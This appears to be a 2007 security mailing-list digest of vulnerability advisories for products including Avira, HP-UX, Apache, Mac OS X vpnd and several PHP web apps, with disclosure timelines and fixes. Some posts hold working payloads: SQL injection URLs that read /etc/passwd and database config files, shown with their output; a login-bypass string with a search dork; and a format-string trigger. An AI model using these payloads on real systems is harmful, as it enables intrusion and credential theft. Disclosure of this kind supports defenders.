n.runs-SA-2007.011 - Avira Antivir Antivirus UPX parsing Divide by Zero Advisory
n.runs AG http://www.nruns.com/ security(at)nruns.com n.runs-SA-2007.011 29-May-2007 Vendor:Avira GmbH, http://www.avira.com Affected Product: Avira Antivir Antivirus Vulnerability: Divide by Zero Engine DoS (remote) Risk: HIGH Vendor communication: 2007/05/07initial notification to Avira GmbH 2007/05/07Avira GmbH Response 2007/05/08PGP public keys exchange 2007/05/09PoC files sent to Avira GmbH 2007/05/10Avira GmbH acknowledged and validated the PoC files 2007/05/16Avira GmbH sent fix release schedule and fixed engine 2007/05/17Sergio Alvarez tested fixed engine 2007/05/23Avira GmbH released Update with fixes Overview: Avira, a company with over 15 millions customers and more than 250 employees is a worldwide leading supplier of self-developed security solutions for professional and private use. With more than 20 years of experience, the company is one of the pioneers in this field. In addition to programs specifically for use on single workstations, Avira primarily offers professional solutions for cross-system protection of networks on various levels. These include products for workstations, file, mail and web servers. Gateway computers can be managed as workstation computers via a central management console for all operating systems. In addition to the management products of the individual solutions, security programs for PDAs, smartphones and embedded devices are also offered. Avira AntiVir Personal, used by millions of private users, represents a significant contribution to security. Description: A remotely exploitable vulnerability has been found in the file parsing engine. In detail, the following flaw was determined: - Divide by Zero in UPX packed files parsing Impact: This problem can lead to remote engine denial of service if an attacker carefully crafts a file that exploits the aforementioned vulnerability. The vulnerability is present in Avira Antivir Antivirus software versions prior to the update Version 7.03.00.09. Solution: The vulnerability was reported on 07.May.2007 and an update has been issued on 23.May.2007 to solve this vulnerability through the regular update mechanism. Credit: Bugs found by Sergio Alvarez of n.runs AG. References: http://forum.antivir-pe.de/thread.php?threadid=22528 This Advisory and Upcoming Advisories: http://www.nruns.com/parsing-engines-advisories.php Unaltered electronic reproduction of this advisory is permitted. For all other reproduction or publication, in printing or otherwise, contact [EMAIL PROTECTED] for permission. Use of the advisory constitutes acceptance for use in an "as is" condition. All warranties are excluded. In no event shall n.runs be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if n.runs has been advised of the possibility of such damages. Copyright 2007 n.runs AG. All rights reserved. Terms of apply.
Full Path Disclosure in Almnzm
Hello Vulnerable : Almnzm Web : http://www.almnzm.com Exploit : http://example.com/almnzm/index.php?action=activateorder&orderid=['Anything'] Discovered By Linux_Drox www.LeZr.Com Best Regards
cpcommerce < v1.1.0 [sql injection]
vendor site:http://cpcommerce.cpradio.org/ product:cpcommerce < v1.1.0 bug: sql injection risk : high note:works regardless of php.ini settings . http://127.0.0.1/cpcommerce/manufacturer.php?id_manufacturer=-9/**/union/**/select/**/pass,LOAD_FILE(0x2F6574632F706173737764),0/**/from/**/cpAccounts/* //result: Information about '8725ade7b722d1ad43b7b949162eab4d' root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh ... http://127.0.0.1/cpcommerce/manufacturer.php?id_manufacturer=-9/**/union/**/select/**/pass,email,0/**/from/**/cpAccounts/* //result: Information about '8725ade7b722d1ad43b7b949162eab4d' [EMAIL PROTECTED] read database credentials plain text: http://127.0.0.1/cpcommerce/manufacturer.php?id_manufacturer=-9/**/union/**/select/**/LOAD_FILE(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F6370636F6D6D657263652F5F636F6E6669672E706870),pass,0/**/from/**/cpAccounts/* //result:Products in '.. // Database Information $config['host'] = "localhost"; // Database Host $config['user'] = "my_user"; // Database Username $config['pass'] = "my_password"; // Database Password $config['database'] = "hi"; // Database Name $config['prefix'] = "cp"; ... '8725ade7b722d1ad43b7b949162eab4d' ps1: 0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F6370636F6D6D657263652F5F636F6E6669672E706870 --> /usr/local/apache2/htdocs/cpcommerce/_config.php ps2: /**/cpAccounts/* --> cp = prefix. Accounts --> table_name . (cp is the default one) so you can try with your table prefix . regards laurent gaffie
Re: DGNews version 2.1 SQL Injection Vulnerability
hi there there's also another sql injection on this script: news.php?go=fullnews&newsid=-9+union+select+1,2,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),4,5,6,7%20from%20news_comment/* //result: "This news has 1 comments. Please read, or post one by click here. * 5 (by: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:..." read the database credentials plain text : news.php?go=fullnews&newsid=-9+union+select+1,2,load_file(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F64676E6577732F61646D696E2F636F6E6E2E706870),4,5,6,7%20from%20news_comment/* //information is in the source code. * 0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F64676E6577732F61646D696E2F636F6E6E2E706870 = /usr/local/apache2/htdocs/dgnews/admin/conf.php ps: works regardless of php.ini settings . regards laurent gaffie
[security bulletin] HPSBUX02087 SSRT4728 rev.5 - HP-UX running TCP/IP Remote Denial of Service (DoS)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00579189 Version: 5 HPSBUX02087 SSRT4728 rev.5 - HP-UX running TCP/IP Remote Denial of Service (DoS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2005-12-09 Last Updated: 2007-05-21 Potential Security Impact: Remote Denial of Service (DoS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP-UX running TCP/IP. The potential vulnerability could be exploited remotely to cause a Denial of Service (DoS). References: CVE-2004-0744 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.00, B.11.04, B.11.11, B.11.23 running TCP/IP. BACKGROUND To determine if an HP-UX system has an affected version, search the output of "swlist -a revision -l fileset" for one of the filesets listed below. For affected systems verify that the recommended action has been taken. AFFECTED VERSIONS HP-UX B.11.00 = - ->Streams.STREAMS-KRN action: install PHNE_30161 or subsequent HP-UX B.11.04 = Networking.NET-KRN action: install PHNE_33427 or subsequent and install sqmax (see Resolution section) HP-UX B.11.11 = Streams.STREAMS-KRN action: install PHNE_34131 or subsequent HP-UX B.11.23 = Streams.STREAMS2-KRN action: install PHKL_31500 or subsequent END AFFECTED VERSIONS RESOLUTION HP has made patches and product updates available to resolve the issue. After installing the recommended patches for B.11.04 a system parameter must be set. A utility, sqmax, must be downloaded and installed to set the required system parameter as discussed below. B.11.00 install PHNE_30161 or subsequent, sqmax not required B.11.04 install PHNE_33427 or subsequent, then install sqmax as discussed below B.11.11 install PHNE_34131 or subsequent, sqmax not required B.11.23 install PHKL_31500 or subsequent, sqmax not required The patches are available from http://itrc.hp.com For B.11.04: After the patches listed above are installed an internal system parameter must be set. A utility, sqmax, has been provided to set the parameter. The sqmax utility is available by writing to [EMAIL PROTECTED] MANUAL ACTIONS: Yes - NonUpdate B.11.04 - After installing patch, install sqmax. Run "/usr/contrib/bin/sqmax 1000" or reboot. PRODUCT SPECIFIC INFORMATION HP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all HP-issued Security Bulletins to provide a subset of recommended actions that potentially affect a specific HP-UX system. For more information: http://software.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6834AA HISTORY Version:1 (rev.1) 14 December 2005 Initial release Version:2 (rev.2) 24 July 2006 New sqmax utility for B.11.04, augmented installation instructions Version:3 (rev.3) 31 July 2006 PHNE_34131 is available for B.11.11 Version:4 (rev.4) 09 October 2006 PHNE_30161 is available for B.11.00 Version:5 (rev.5) 21 May 2007 Corrected fileset information for PHNE_30161 Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: [EMAIL PROTECTED] Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP =
RedLevel Advisory #23 - SalesCart Shopping Cart SQL Injection Vulnerability
SalesCart Shopping Cart - SQL Injection Vulnerability SalesCart does not sanitize any forms in cgi-bin/reorder2.asp, allowing an attacker to inject arbitrary SQL queries, as well as possible command execution. Google d0rk: "Sorry, you have no Items in your Shopping Cart !" inurl:cgi-bin/view1.asp Vulnerable Variable: All forms in reorder2.asp Vulnerable File: cgi-bin/reorder2.asp (password: x' OR 'x'='x) Vendor Status: Notified multiple times, no response. Possible silent patch. John Martinelli [EMAIL PROTECTED] RedLevel Security RedLevel.org May 30th, 2007
Apache httpd vulenrabilities
PSNC Security Team has got the pleasure to announce that, as a result of Apache httpd server (ver. 1.3.x, 2.0.x and 2.2.x) source code analysis, several vulnerabilities have been found that make it possible to perfom a DoS attack against the services and the system that the application is running on. Below the basic information on found vulnerabilities may be found: Vuln#1 Httpd Server DoS Test environment: ver. 2.0.59, 2.2.4, prefork mpm module An appropriate code run in the worker process context makes it possible to kill all worker processes with simultaneous blocking of creating new worker processes by the master process. As a result, the server stops to accept and handle new connections. Vuln #2 SIGUSR1 killer Test environment: ver. 2.0.59, 2.2.4 prefork mpm module An appropriate code run in the worker process context makes it possible to send SIGUSR1 signals by the master process (that runs with root credentials) to an arbitrary process within the system. Vuln #3 SIGUSR1 killer Test environment: ver 1.3.37 An appropriate code run in the worker process context makes it possible to send SIGUSR1 signals by the master process (that runs with root credentials) to an arbitrary process within the system. Vuln #4 System DoS Test environment: ver 2.0.59, 2.2.4 prefork mpm module An appropriate code run in the worker process context makes it possible to force the master process to create an unlimited amount of new worker processes. As a result, the activity of the whole system may be blocked. Countermeasures: Disabling the possibility of running the user.s code in the worker process context. An especial emphasis should be put on programming languages that may be configures as an Apache module (like mod_php, mod_perl etc.) in order to block dangerous functions, e.g. dl(), dlopen(). The information on the vulnerabilities above was sent to Apache Software Foundation on 16 May, 2006. For over 1 year no official patch has been issued. PSNC Security Team is currently working on its own, unofficial patches. Our patches will be published on 18 June, 2007 on the team webpage (http://security.psnc.pl). On 20 June, 2007 the detailed information on the found vulnerabilities will be issued. PSNC Security Team
Re: Mac OS X vpnd local format string
OSX client is also vulnerable and exploitable. -KF On May 29, 2007, at 7:26 AM, NGSSoftware Insight Security Research wrote: === Summary === Name: Mac OS X vpnd local format string Release Date: 29 May 2007 Reference: NGS00496 Discover: Chris Anley <[EMAIL PROTECTED]> Vendor: Apple Vendor Reference: 26417237 CVE-ID: CVE-2007-0753 Systems Affected: OS X Server 10.4.9 and prior Risk: High Status: Published TimeLine Discovered: 15 March 2007 Reported: 19 March 2007 Fixed: 24 May 2007 Published: 29 May 2007 === Description === The 'vpnd' command shipped with OS X runs setuid root, and is vulnerable to a format string attack. = Technical Details = The vpnd command, when run with the '-i' parameter, is vulnerable to a format string attack. The command is setuid root, and is world- executable. This allows any local user to execute arbitrary code as root, though the vulnerable code is only accessible by default on server versions of OS X. It is possible for a client version of OS X to be configured in a vulnerable manner, though this requires extensive configuration changes and is unlikely to happen by accident. Demonstration: Apple:~ shellcoders$ sw_vers ProductName:Mac OS X Server ProductVersion: 10.4.9 BuildVersion: 8P135 Apple:~ shellcoders$ vpnd -n -i _ABCD_%268\$x 2007-03-15 17:07:07 GMT Server '_ABCD_%268$x' starting... 2007-03-15 17:07:07 GMT Server ID '_ABCD_41424344' invalid 2007-03-15 17:07:07 GMT Error processing prefs file (gdb) bt #0 0x90011cb8 in __vfprintf () #1 0x9002a90c in vsnprintf () #2 0x9002a41c in vsyslog () #3 0x3150 in vpnlog () #4 0x4b80 in process_prefs () #5 0x28d4 in main () The source code for vpnd is available from the Apple Darwin source code download site. The relevant code is in the ppp package. The code is distributed under the Apple Public Source License, available at http://www.opensource.apple.com/apsl/ The bug occurs in the process_prefs() function in vpnoptions.c. The user-specified server name is passed into the snprintf() function as data, and the resulting string is then passed to the vpnlog() function, as the format_str parameter. Although the server name is limited to 64 characters (with '%.64s') it is still straightforward to exploit the bug, and NGS have written a reliable exploit. === Fix Information === This issue was fixed by Apple in Security Update 2007-005, released on the 24th May 2007. NGS would like to thank the Apple Security Team for their professional and prompt response to this issue. NGSSoftware Insight Security Research http://www.ngssoftware.com/ http://www.databasesecurity.com/ http://www.nextgenss.com/ +44(0)208 401 0070 -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402
[MajorSecurity Advisory #48]eggblog - Session fixation Issue
[MajorSecurity Advisory #48]eggblog - Session fixation Issue Details === Product: eggblog Affected version: 3.1.0 and prior Remote-Exploit: yes Vendor-URL: http://www.eggblog.net Vendor-Status: informed Advisory-Status: published Credits Discovered by: David Vieira-Kurz http://www.majorsecurity.de Original Advisory: http://www.majorsecurity.de/index_2.php?major_rls=major_rls48 Introduction "eggblog is a free php & mysql package, allowing you to create your own online website, journal or weblog (blog)." -from eggblog.net More Details 1. Session fixation: The "PHPSESSID" parameter can be set to a malicious and arbitrary value. 1.1 Description: In a session fixation attack, the attacker fixes the user's session ID before the user even logs into the target server. After a user's session ID has been fixed, the attacker will wait for them to login. Once the user does so, the attacker uses the predefined session ID value to assume their online identity. Workaround: 1. Do not accept session identifiers from GET / POST variables. 2.Regenerate SID on each request. 3. Accept only server generated SID: One way to improve security is to not accept session identifiers not generated by server. if ( ! isset( $_SESSION['SERVER_GENERATED_SID'] ) ) { session_destroy(); // destroy all data in session } session_regenerate_id(); // generate a new session identifier $_SESSION['SERVER_GENERATED_SID'] = true; History/Timeline 25.05.2007 discovery of the vulnerability 27.05.2007 contacted the vendor 27.05.2007 working patch sent to the vendor 29.05.2007 advisory is written 29.05.2007 advisory released MajorSecurity === MajorSecurity is a non-profit German penetration testing and security research project which consists of only one person at the present time. http://www.majorsecurity.de/
Mac OS X vpnd local format string
=== Summary === Name: Mac OS X vpnd local format string Release Date: 29 May 2007 Reference: NGS00496 Discover: Chris Anley <[EMAIL PROTECTED]> Vendor: Apple Vendor Reference: 26417237 CVE-ID: CVE-2007-0753 Systems Affected: OS X Server 10.4.9 and prior Risk: High Status: Published TimeLine Discovered: 15 March 2007 Reported: 19 March 2007 Fixed: 24 May 2007 Published: 29 May 2007 === Description === The 'vpnd' command shipped with OS X runs setuid root, and is vulnerable to a format string attack. = Technical Details = The vpnd command, when run with the '-i' parameter, is vulnerable to a format string attack. The command is setuid root, and is world-executable. This allows any local user to execute arbitrary code as root, though the vulnerable code is only accessible by default on server versions of OS X. It is possible for a client version of OS X to be configured in a vulnerable manner, though this requires extensive configuration changes and is unlikely to happen by accident. Demonstration: Apple:~ shellcoders$ sw_vers ProductName:Mac OS X Server ProductVersion: 10.4.9 BuildVersion: 8P135 Apple:~ shellcoders$ vpnd -n -i _ABCD_%268\$x 2007-03-15 17:07:07 GMT Server '_ABCD_%268$x' starting... 2007-03-15 17:07:07 GMT Server ID '_ABCD_41424344' invalid 2007-03-15 17:07:07 GMT Error processing prefs file (gdb) bt #0 0x90011cb8 in __vfprintf () #1 0x9002a90c in vsnprintf () #2 0x9002a41c in vsyslog () #3 0x3150 in vpnlog () #4 0x4b80 in process_prefs () #5 0x28d4 in main () The source code for vpnd is available from the Apple Darwin source code download site. The relevant code is in the ppp package. The code is distributed under the Apple Public Source License, available at http://www.opensource.apple.com/apsl/ The bug occurs in the process_prefs() function in vpnoptions.c. The user-specified server name is passed into the snprintf() function as data, and the resulting string is then passed to the vpnlog() function, as the format_str parameter. Although the server name is limited to 64 characters (with '%.64s') it is still straightforward to exploit the bug, and NGS have written a reliable exploit. === Fix Information === This issue was fixed by Apple in Security Update 2007-005, released on the 24th May 2007. NGS would like to thank the Apple Security Team for their professional and prompt response to this issue. NGSSoftware Insight Security Research http://www.ngssoftware.com/ http://www.databasesecurity.com/ http://www.nextgenss.com/ +44(0)208 401 0070 -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402
myEvent version 1.6 Multiple Path Disclosure Vulnerabilities
netVigilance Security Advisory #24 myEvent version 1.6 Multiple Path Disclosure Vulnerabilities Description: myEvent is Dynamic Calendar based Events Management system with admin panel for adding events, edit and delete built using PHP & mySQL. Display today's event and future events links on the calendar, Event will be displayed in 3 mode eg : pop-up, new windows and on same screen once link is clicked. There is also a mouse-over tool tip to display the events Template based and Simple easily intergrated to any websites. External References: Mitre CVE: CVE-2007-0690 NVD NIST: CVE-2007-0690 OSVDB: 34272 Summary: myEvent is Dynamic Calendar based Events Management system with admin panel for adding events, edit and delete built using PHP and mySQL. Multiple pass disclosure vulnerabilities in the product allow attackers to gather the true path of the server-side script. Advisory URL: http://www.netvigilance.com/advisory0024 Release Date: 05/28/2007 Severity: Risk: Low CVSS Metrics Access Vector: Remote Access Complexity: Low Authentication: Not-required Confidentiality Impact: Partial Integrity Impact: None Availability Impact: None Impact Bias: Normal CVSS Base Score: 2.3 Target Distribution on Internet: Low Exploitability: Functional Exploit Remediation Level: Workaround Report Confidence: Uncorroborated Vulnerability Impact: Attack Host Impact: Path disclosure. SecureScout Testcase ID: TC 17954 Vulnerable Systems: myEvent version 1.6 Vulnerability Type: Program flaw - The myevent.php and login.php scripts has flaws which lead to Warnings or even Fatal Error. Vendor: myWebland Vendor Status: The Vendor has been notified several times on many different email addresses last on 15 May 2007. The Vendor has not responded. There is no official fix at the release of this Security Advisory. Workaround: Disable warning messages: modify in the php.ini file following line: display_errors = Off. Or modify .htaccess file (this will work only for the apache servers). Example: Path Disclosure Vulnerability 1: REQUEST: http://[TARGET]/[PRODUCT-DIRECTORY]/myevent.php?monthno[]=2&year=2007 REPLY: Warning: htmlspecialchars() expects parameter 1 to be string, array given in [DISCLOSED PATH]\[PRODUCT-DIRECTORY]\initialize.php on line 71 Path Disclosure Vulnerability 2: REQUEST http://[TARGET]/[PRODUCT-DIRECTORY]/ myevent.php?view[]=1 REPLY: Warning: htmlspecialchars() expects parameter 1 to be string, array given in [DISCLOSED PATH]\[PRODUCT-DIRECTORY]initialize.php on line 83 Path Disclosure Vulnerability 3: REQUEST: http://[TARGET]/[PRODUCT-DIRECTORY]/login.php Enter Login but do not enter password. Click "Log In" REPLY: Fatal error: Call to undefined function: notice() in [DISCLOSED PATH]\[PRODUCT-DIRECTORY]\login.php on line 29 Credits: Jesper Jurcenoks Co-founder netVigilance, Inc www.netvigilance.com